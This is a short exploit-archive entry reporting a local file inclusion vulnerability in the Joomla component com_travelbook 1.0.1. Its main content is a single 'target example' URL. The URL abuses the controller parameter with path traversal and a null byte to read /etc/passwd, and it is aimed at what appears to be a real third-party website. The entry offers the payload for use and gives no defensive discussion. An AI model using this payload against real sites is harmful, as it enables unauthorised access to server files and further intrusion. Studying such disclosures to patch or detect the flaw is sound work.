id: 11724
date: 04/11/2010
title: Joomla Component com_travelbook Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

==================================================================
Joomla Component com_travelbook Local File Inclusion Vulnerability
==================================================================

# Exploit Title:
Joomla Component TRAVELbook Local File Inclusion Vulnerability
 
# Date:
April 11 2010
 
# Author:
AntiSecurity
 
# Software Link:
http://www.demo-page.de/
 
# Version:
com_travelbook version 1.0.1
 
# Tested on:
Linux
 
# Target example
http://familytravelagency.net/index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-22]  #